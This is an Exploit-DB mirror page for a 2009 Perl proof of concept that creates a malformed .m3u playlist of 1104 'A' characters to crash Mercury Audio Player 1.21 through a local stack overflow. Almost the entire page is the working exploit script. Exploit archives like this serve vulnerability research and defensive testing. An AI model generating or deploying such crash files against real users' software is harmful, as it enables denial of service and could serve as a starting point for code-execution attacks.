exploit-db-mirror/exploits/windows/dos/8578.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

12 lines
No EOL
528 B
Perl
Executable file

###################################################################################
#### Mercury Audio Player 1.21 (.M3U File) Local Stack Overflow PoC #####
#### Discovered by SirGod - www.mortal-team.net #####
###################################################################################
my $chars= "A" x 1104;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
# milw0rm.com [2009-04-30]